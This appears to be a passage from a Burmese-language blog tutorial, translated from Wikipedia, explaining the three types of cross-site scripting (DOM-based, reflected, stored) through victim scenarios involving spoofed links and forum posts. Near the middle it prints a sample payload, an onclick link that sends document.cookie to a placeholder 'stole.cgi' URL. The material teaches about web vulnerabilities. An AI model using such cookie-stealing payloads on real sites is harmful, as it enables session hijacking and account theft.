  3. တိုက်ခိုက်သူက ကြိုတင်ဖန်တီးထားသည့်အတိုင်းပင် ၄င်းစာမျက်နှာတွင် ပါလာသော JavaScript သင်္ကေတများက သားကောင်၏ ကွန်ပျုတာထဲတွင် ရှိနှင့်နေသော ဟာကွက် ဖြစ်ပေါ်နေသည့် အင်တာနက်စာမျက်နှာ တစ်ခုကို ထပ်ဖွင့်လိုက်ကြသည်။
  4. အဆိုပါ ဟာကွက်ဖြစ်ပေါ်နေသည့် အင်တာနက်စာမျက်နှာထဲတွင် ပါဝင်နေသော JavaScript သင်္ကေတများက သားကောင်၏ ကွန်ပျုတာ ဟာ့ဒ်ဒစ် (Local zone) အတွင်းတွင် ကောင်းစွာ အလုပ်လုပ်နိုင်သည်။
  5. ဤနည်းအားဖြင့် တိုက်ခိုက်သူပေးပို့လိုက်သော ကောက်ကျစ်စွာ ဖန်တီးထားသော သင်္ကေတများသည် သားကောင်၏ ကွန်ပျူတာထဲတွင် ကြိုတင်ရှိနေသော ဟာကွက်ကို အခွင့်ကောင်းယူ အသုံးချလျက် -
    1. အမိန့်ပေးချက်များ ပေးပို့ ခိုင်းစေနိုင်သည်။
    2. အချို့သော ဆော့ဖ်ဝဲများ ပရိုဂရမ်များကို သားကောင်မသိဘဲ တိတ်တဆိတ် အလုပ်လုပ်စေနိုင်သည်။
    3. တိုက်ခိုက်သူထံအချက်အလက်များ ပြန်လည်ပေးပို့နိုင်သည်။
အားနည်းချက် (၂)-တိုက်ခိုက်မှု
  1. ကျော်ကျော်သည် အောင်အောင်တည်ထောင်ထားသော ၀က်ဘ်ဆိုက်တစ်ခုဆီသို့ မကြာခဏ ၀င်ရောက်လည်ပတ်လေ့ ရှိသည်။ ၄င်းဝက်ဘ်ဆိုက်သို့ ၀င်ရောက်နိုင်ရန်အတွက် ကျော်ကျော်သည် Username နှင့် Password တစ်ခုကို အသုံးပြုရသည်။ ၀က်ဘ်ဆိုက် ထဲတွင် ကျော်ကျော်၏ ငွေကြေးဆိုင်ရာ အချက်အလက် များကဲ့သို့သော အရေးကြီး အချက်အလက်များ သိမ်းဆည်းထားသည်။
  2. တိုက်ခိုက်သူတစ်ဦးက အောင်အောင်၏၀က်ဘ်ဆိုက်တွင် “အခြေအနေအပေါ်မူတည်ပြီး ဖြစ်ပေါ်လာသောပျော့ကွက် - Reflected XSS ” တစ်ခု ဖြစ်ပေါ်နေကြောင်း လေ့လာ တွေ့ရှိထားသည်။
  3. တိုက်ခိုက်သူသည် အဆိုပါ အားနည်းချက်ကို အမြတ်ထုတ်နိုင်ရန်အတွက်-
    1. (အောင်အောင်၏ ၀က်ဘ်ဆိုက်လိပ်စာနှင့် ဆင်တူယိုးမှား) အင်တာနက်လိပ်စာအတုတစ်ခုကို ဖန်တီးလိုက်ပြီး ကျော်ကျော်ထံသို့ အီးမေးလ်တစ်စောင်ပေးပို့လိုက်သည်။
    2. ၄င်းအီးမေးလ်ကိုလည်း အောင်အောင့် ထံမှ ပေးပို့သည့်အလား အပြင်အဆင်တူအောင် အားလုံး လှည့်စား ဖန်တီး ထားသည်။
    3. (အင်တာနက် လုံခြုံရေးနယ်ပယ်တွင် ဤနည်းစနစ်ကို အီးမေးလိပ်စာ လှည့်ဖျားခြင်း - e-mail address spoofing ဟု ခေါ်ကြသည်။)
      (ဥပမာ - --www.google.com-- အစား --www.googla.com--, --www.domainname.com အစား --www.domainame.com-- etc)
  4. ကျော်ကျော်သည်-
    1. ( ၄င်းမကြာခဏ အသုံးပြုနေသော အောင်အောင်၏၀က်ဘ်ဆိုက်မှ ပေးပို့သည့်စာ အမှတ်ဖြင့်) တိုက်ခိုက်သူ၏ အီးမေးလ်ကို ဖွင့်ကြည့်ရင်း
    2. အထဲရှိ အင်တာနက်လိပ်စာ အတိုင်း လိုက်သွားကာ အောင်အောင်၏ ၀က်ဘ်ဆိုက်တွင် Log In ပြုလုပ်သည်။
  5. ဤတွင်-
    1. တိုက်ခိုက်သူ ဖန်တီးထားသော အင်တာနက်လိပ်စာ အတုအတွင်း မြုတ်နှံထည့်သွင်း ထားသော မသမာသည့် သင်္ကေတများက
    2. အောင်အောင်၏ ၀က်ဘ်ဆိုက် အတွင်းမှ တိုက်ရိုက်ပေးပို့လိုက်သော သင်္ကေတများ ကဲ့သို့ ဟန်ဆောင်ကာ
    3. ကျော်ကျော်၏ အင်တာနက်ကြည့် ဆော့ဖ်ဝဲအတွင်းတွင် အလုပ်လုပ်တော့သည်။
    4. ကျော်ကျော်မှ အောင်အောင်၏ ၀က်ဘ်ဆိုက် အတွင်းသို့ ၀င်ရောက်နိုင်ရန် ထည့်သွင်းပေးရသော အရေးကြီးသော အချက်အလက်များ (User name, Password, Billing informations .... etc.)ကို ခိုးယူကာ တိုက်ခိုက်သူထံသို့ တိတ်တဆိတ်ပေးပို့ နေတော့သည်။
    5. example - Image taken from Microsoft MSDN libarary for XSS
အားနည်းချက် (၃)-တိုက်ခိုက်မှု
  1. အောင်အောင်သည် ၀က်ဘ်ဆိုက်တစ်ခုကို တည်ထောင်ထားသည်။ ၄င်းဆိုက်ကို အသုံးပြုနေကြသော သူများသည် အခြားသောသူများ ဖတ်ရှုစေနိုင်ရန်အတွက် အသိပေးချက်များနှင့် အခြားအကြောင်းအရာများကို ပေးပို့ခွင့်ရှိကြသည်။( ဥပမာ-အင်တာနက်ပေါ်ရှိ ဖိုရမ်များ)
  2. တိုက်ခိုက်သူ တစ်ဦးသည် အောင်အောင်၏၀က်ဘ်ဆိုက်တွင် XSS အားနည်းချက်(၃) ကို အသုံးပြု၍ တိုက်ခိုက်နိုင်သည့် ပျော့ကွက်ရှိနေကြောင်း သတိထားမိသည်။
  3. တိုက်ခိုက်သူသည် (လူ့တို့၏ စိတ်ဝင်စားတတ်သော သဘာဝကိုကောင်းစွာအသုံးချလျက်) ၀က်ဘ်ဆိုက်သို့ ရောက်လာမည့် အခြားသူများလည်း သေချာပေါက်လာရောက်ကြည့်ရှုမည့် အငြင်းပွားဖွယ်ရာ ဆွေးနွေးငြင်းခုန်စရာ အသိပေးချက်အချို့ကို တင်ထားလိုက်သည်။
  4. ထိုအသိပေးချက်များထဲတွင် တိတ်တဆိတ် မြုတ်နှံထည့်သွင်းထားသော သင်္ကေတများကြောင့်၊ လာရောက်ဖတ်ရှုကြသည့်-
    1. ၄င်းဝက်ဘ်ဆိုက်သို့ လာရောက်လည်ပတ်သောသူများ၏ လတ်တလောအခြေအနေကို သိမ်းဆည်းထားသည့် အချက်အလက်များ (Session cookies) သို့မဟုတ်
    2. အခြားသော အထောက်အထားများ ( User name, password စသည်)ကို ထိုသူများ မသိအောင် တိုက်ခိုက်သူ၏ Web Server ထံသို့ တိတ်တဆိတ် ပေးပို့တော့သည်။
  5. နောက်ပိုင်းတွင် တိုက်ခိုက်သူသည် အခြားသောသူများအမည်ဖြင့် ၀က်ဘ်ဆိုက်ထဲသို့ ၀င် ရောက်ပြီး ထင်ရာလုပ်နိုင်လေသည်။
  6. Session cookie များခိုးယူနိုင်သော နမူနာ သင်္ကေတများ
-< href="#" onclick="window.location='http://example.com/stole.cgi?text='+escape(document.cookie); return false;">Click here! < /a >-

ဆက်လက်ဖော်ပြပါမည် ....

REF - http://en.wikipedia.org/wiki/Xss

Jul 6, 2007

XSS သို့မဟုတ် Cross-Site Scripting - အမျိုးအစားများ


အမျိုးအစားများ

အခုအချိန်တွင် XSS ၏အားနည်းချက်များကို အမျိုးအစားသုံးမျိုးဖြင့် ဖော်ပြကြသည်။
၎င်းတို့ကို အခေါ်ရလွယ်စေရန် အားနည်းချက် (၁)(၂)(၃) ဟု အမည်ပေးလိုက်ပါမည်။

အားနည်းချက် (၁)

XSS ၏အားနည်းချက်(၁) ကို DOM-based သို့မဟုတ် Local cross-site scripting ဟုပြောကြသည်။ ပြဿနာက တခြားနေရာမှာ မရှိဘဲ ၄င်းအင်တာနက် စာမျက်နှာအတွင်းမှာပင် ရှိနေသည်။ ဥပမာ - ဆိုကြပါစို့
  • အကယ်၍ JavaScript သင်္ကေတ တစ်ခုသည် အင်တာနက်လိပ်စာ (URL) တစ်ခုကို တောင်းဆိုသည့် ဆောင်ရွက်ချက်တစ်ခုကို ပြုလုပ်ပြီးနောက်
  • ရရှိလာသော အချက်အလက်များကို အသုံးပြုပြီး
  • မူလစာမျက်နှာအတွင်းမှာပင် HTML အချို့ပြန်ရေးလိုက်သည့် အခါမျိုးတွင် XSS ဂယ်ပေါက်(hole) တစ်ခုဖြစ်လာသည်။
လက်တွေ့အားဖြင့် အားနည်းချက်(၁)မှာ (၂)နှင့် အတော်လေးဆင်တူသည်။အလွန်အရေးကြီးသော အချက်တစ်ချက်တွင်သာလျှင် ကွဲလွဲမှုရှိနေသည်။
  • Internet Explorer ဆော့ဖ်ဝဲ၏ Local Zone ဟုခေါ်သော၊ အင်တာနက်သုံးနေသူများ၏ ဟာ့ဒ်ဒစ်အတွင်းရှိ Client-site script များကိုကိုင်တွယ် လုပ်ဆောင်ပုံကြောင့်၊
  • အားနည်းချက်(၁)မှတဆင့် အဝေးမှ ထိမ်းကျောင်းနိုင်သော အနေအထားမျိုးအထိ ဖြစ်သွားစေနိုင်သည်။
ဥပမာ -
  • တိုက်ခိုက်သူတစ်ဦးသည် ကောက်ကျစ်သော ၀က်ဘ်ဆိုက်တစ်ခုကို အသုံးပြုလျက်ရှိနေသည်။
  • ၄င်းဆိုက်တွင် အင်တာနက်သုံးနေသူတစ်ဦး၏ ကွန်ပျုတာအတွင်းရှိ ဂယ်ပေါက်ဖြစ်နေသော စာမျက်နှာတစ်ခုနှင့် ချိတ်ဆက်မှု(Link)တစ်ခုပါဝင်နေသည့် ဆိုပါစို့။
  • ထိုအခါတွင် တိုက်ခိုက်သူသည် သားကောင်၏ အင်တာနက်ကြည့်ဆော့ဖ်ဝဲ အတွင်းမှ ဟာကွက်ကိုကောင်းစွာအသုံးချပြီး ၄င်းလိုရာ သင်္ကေတများကို သားကောင်၏ ကွန်ပျုတာအတွင်းသို့ တိတ်တဆိတ် ထည့်သွင်းလိုက်နိုင်သည်။
အားနည်းချက် (၂)

အားနည်းချက် (၂)ကို non-persistent သို့မဟုတ် reflected ပျော့ကွက် ဟုပြောကြသည်။ အမြဲတမ်း ရှိမနေဘဲ အခြေအနေအချို့အပေါ်မူတည်ပြီး ဖြစ်လာသည့် ပျော့ကွက်ဖြစ်သည် ဟု ဆိုနိုင်သည်။ အများဆုံးဖြစ်လေ့ရှိသော ပျော့ကွက်လည်းဖြစ်သည်။
  • ဆာဗာဘက်ခြမ်းရှိ သင်္ကေတများ (Server-site scripts)အနေဖြင့် အင်တာနက်သုံးနေသူ တစ်ဦးမှ ထည့်သွင်းပေးလိုက်သော အချက်အလက်များကို အသုံးပြုပြီး
  • ၄င်းအင်တာနက်သုံးသူအတွက် လိုအပ်သော စာမျက်နှာတစ်ခုကို
  • ဖြေကြားချက်အဖြစ် ချက်ချင်းပြန်လည် ပေးပို့ရလေ့ရှိသည်။
  • အကယ်အားဖြင့် အသုံးပြုသူများ ထည့်ပေးလိုက်သည့် အချက်အလက်များကို စနစ်တကျ စစ်ဆေးခြင်းမပြုဘဲ (Unvalidated User-supplied Data အဖြစ်) လက်ခံမိလိုက်သည့်အခါ၊
  • ၄င်းအချက်အလက်များမှာ ဆာဗာမှ ပြန်လည်ပေးပို့လိုက်သည့် စာမျက်နှာများထဲတွင် ပါဝင် သွားသည်။
  • ဤအခြေအနေမျိုးက အသုံးပြုသူဘက်ရှိ သင်္ကေတများကို အသက်ဝင်ပြောင်းလဲနေသော (Dynamic) စာမျက်နှာတစ်ခု အတွင်းသို့ ထည့်ပေးလိုက်သလို ဖြစ်သွားစေသည်။
စံအဖြစ်ဖော်ပြလေ့ရှိသော ဥပမာမှာ ရှာဖွေရေးဝက်ဘ်ဆိုက်များ (Search Engines) တွင်ဖြစ်သည်။
  • အကယ်၍ တစ်စုံတစ်ယောက်သည် ရှာဖွေရေးဝက်ဘ်ဆိုက်တစ်ခုတွင် ရှာဖွေလိုသည့် စကားလုံးများ ထည့်သွင်းသည့်အခါ
  • HTML မှ အထူးသင်္ကေတအချို့ကို ထည့်သွင်းရှာဖွေလိုက်သည်ဆိုပါစို့၊
  • ထိုအခါတွင် ထိုသူ ထည့်သွင်းရှာဖွေလိုက်သော စာကြောင်းများကို
    • ရရှိလာသော အဖြေများထဲတွင် ပြန်လည်ထည့်သွင်း ဖော်ပြပေးခြင်း သို့မဟုတ်
    • ရှာနေသော အကြောင်းအရာကို အလွယ်တကူ ပြန်လည်ပြင်ဆင်နိုင်ရန်အတွက် ပြန်လည်ဖော်ပြပေးခြင်းမျိုးကို မဖြစ်မနေဆောင်ရွက်ပေးရသည်။
  • အကယ်၍ ထည့်ပေးလိုက်သော အသုံးအနှုံးများအားလုံးတွင် HTML အတွက် အကျုံးမ၀င်သော အချက်အလက်များ ပါလာသည့်အခါ XSS ဂယ်ပေါက် တစ်ခု ဖြစ်လာသည်။




အစပိုင်းတွင် ဤဖြစ်ရပ်မှာ-
  • အင်တာနက်သုံးသူများအနေဖြင့် မိမိ၏အင်တာနက်ကြည့် ဆော့ဖ်ဝဲအတွင်းရှိ စာမျက်နှာများတွင်သာ သင်္ကေတများ ပြန်လည်ထည့်သွင်းလိုက်သလိုမျှသာ ဖြစ်နေသောကြောင့်
  • ဆိုးဆိုးရွားရွား ပြဿနာတစ်ရပ်အနေဖြင့် ပေါ်လာခဲ့ခြင်း မရှိပေ။
  • သို့ရာတွင် တိုက်ခိုက်မှုလုပ်ဆောင်လိုသူတစ်ဦးအနေဖြင့် Social Engineering နည်းပညာအချို့ကို အသုံးပြုပြီး
    • အင်တာနက်သုံးသူတစ်ဦးထံသို့
    • ၄င်းအတွက် အလုပ်လုပ်ပေးမည့် သင်္ကေတများ ပါဝင်နေသော စာမျက်နှာတစ်ခုထံသို့ ရောက်ရှိစေမည့် အင်တာနက်လိပ်စာတစ်ခုကို ဖွင့်ကြည့်မိစေရန် စည်းရုံးသိမ်းသွင်း နိုင်စေသည့် အခွင့်အရေး ရရှိစေနိုင်လာသည်။
(Social Engineering - မသိနားမလည်သူ၊ အင်တာနက်သုံးသူများ၏ အားနည်းချက်ကို အခွင့်ကောင်းယူပြီး ထိုသူများထံမှ အရေးကြီးသော ကိုယ်ရေးအချက်အလက်များ ငွေကြေးဆိုင်ရာအချက်အလက်များ လှည့်ပတ်ရယူပြီး အမြတ်ထုတ်ခြင်း - သီးခြားဖော်ပြပါမည်)

အားနည်းချက် (၃)

အားနည်းချက် (၃)ကို သိမ်းဆည်းထားသော (သို့) အမြဲရှိနေသော (သို့) ဒုတိယအဆင့် ပျော့ကွက်၊အားနည်းချက် ဟု ပြောလေ့ ရှိကြသည်။ အစွမ်းအထက်ဆုံးသော တိုက်ခိုက်မှုအမျိုးအစားများ ဖြစ်ပေါ်စေနိုင်သည်။
ဥပမာတစ်ခု အနေဖြင့်
  • အင်တာနက်ပေါ်ရှိနေရာ (သို့) ဆာဗာ (သို့) ဖိုင်သိုလှောင်သိမ်းဆည်းရေးစနစ် တစ်ခုခု အတွင်းသို့ အသုံးပြုနေသူတစ်ဦးက (ပထမလူ-တိုက်ခိုက်သူ) အချက်အလက်များကို ပေးပို့ ထည့်သွင်းသိမ်းဆည်းလိုက်သည်။
  • နောက်တစ်ချိန်တွင် အခြားသော အသုံးပြုသူတစ်ဦးက (ဒုတိယလူ-သားကောင်) ၄င်းစာမျက်နှာကို ဖွင့်ကြည့်လိုက်မိသည့်အခါတွင် တိုက်ခိုက်သူဆင်ထားသော ထောင်ချောက်ထဲသို့ ရောက်ရှိသွားရတော့သည်။
  • အထူး စံထားပြသနိုင်သည့် ဥပမာတစ်ရပ်မှာ Online Message Boards များဖြစ်သည်။
  • ၄င်းနေရာများသည် အခြားသော ကြည့်ရှုသူများဖတ်ရှုနိုင်ရန်အတွက် HTML သင်္ကေတများကို ထည့်သွင်းနိုင်ရန် လမ်းဖွင့်ပေးထားခြင်း ကြောင့်ဖြစ်သည်။
ဤအားနည်းချက်များမှာ အများအားဖြင့် အခြားသောအမျိုးအစားများထက် သိသိသာသာ အကျိုးသက်ရောက်မှုဖြစ်စေသည်။ အကြောင်းမှာ တိုက်ခိုက်သူတစ်ဦး အနေဖြင့် သင်္ကေတ (Script) အချို့ထည့်သွင်းပေးလိုက်ရုံသာ ဖြစ်ပြီး အခြားသော သားကောင် အမြောက်အများကို တိုက်ခိုက်နိုင်သောကြောင့် ဖြစ်ပေသည်။

သားကောင်၏ ကွန်ပျုတာများအတွင်းသို့ သင်္ကေတများ ထည့်သွင်းတိုက်ခိုက်ပုံ နည်းစနစ်များ (Methods of Injection) မှာ အမျိုးမျိုး ပြောင်းလဲနေနိုင်သည်။
  • တိုက်ခိုက်သူတစ်ဦးသည် အထက်တွင်ဖော်ပြထားခဲ့သော ပျော့ကွက်၊ ဟာကွက်များ သားကောင်၏ ကွန်ပျုတာပေါ်တွင် ဖြစ်ပေါ်လာစေရန်အတွက် အင်တာနက်အသုံချဆော့ဖ်ဝဲ (Web Application) တစ်ခုခုကို အသုံးပြုရန် လိုချင်မှ လိုမည်ဖြစ်သည်။
  • အင်တာနက် အသုံးချဆော့ဖ်ဝဲ (အီးမေးလ် ၊ System log စသည့်) အရာတစ်ခုခုမှ လက်ခံရရှိလိုက်သည့် (တိုက်ခိုက်သူတစ်ဦးမှ ထိန်းချုပ်ထားနိုင်ချေရှိနေသော) မည်သည့် အချက်အလက်မဆိုသည် အသက်ဝင် နေသော စာမျက်နှာတစ်ခုအဖြစ် (Dynamic page) ပြန်လည်ဖော်ပြရမည့်နေရာတွင်
  • ရှိသင့်ရှိထိုက်သော သက်ဆိုင်ရာ သင်္ကေတများဖြင့် အပြည့်အ၀ ပါရှိနေရမည် ဖြစ်သည်။
  • အကယ်၍ ပါရှိမနေပါက ရလာဒ်အနေဖြင့် XSS ဆိုင်ရာ ဂယ်ပေါက် တစ်ခု ဖြစ်ပေါ်လာမည် ဖြစ်ပေသည်။
အခြေအနေအမျိုးမျိုးကြောင့် အခုဖော်ပြထားတာတွေကို အတော်လေးအချိန်ယူ ဘာသာပြန်လိုက်ရပါတယ် ... နည်းပညာ တစ်ခုဖြစ်နေတာရော ကိုယ်နဲ့ဝေးတဲ့ အကြောင်းအရာတစ်ခုဖြစ်နေတာကြောင့်ရော အတော်လေး ခေါင်းစားခဲ့ပါတယ် ပညာလည်း အတော်ရလိုက်ပါတယ် ... အခုဖော်ပြထားတာတွေက မပြည့်စုံသေးပါဘူး စာကြောင်းတွေက ရှည်နေတဲ့ အတွက် သည်းခံဖတ်ပေးစေချင်ပါတယ် ... နောက်ထပ် ဆက်ပြီး ဘယ်လို အတိုက်ခိုက်ခံရနိုင်တာလဲ ... ဘယ်လို အကာအကွယ်တွေ လုပ်မလဲ ဆိုတာတွေကို နမူနာတွေ ရုပ်ရှင်တွေနဲ့ ရှာဖွေ ဖော်ပြသွားမှာပါ ....

ဆက်လက်ဖော်ပြပါမည် ....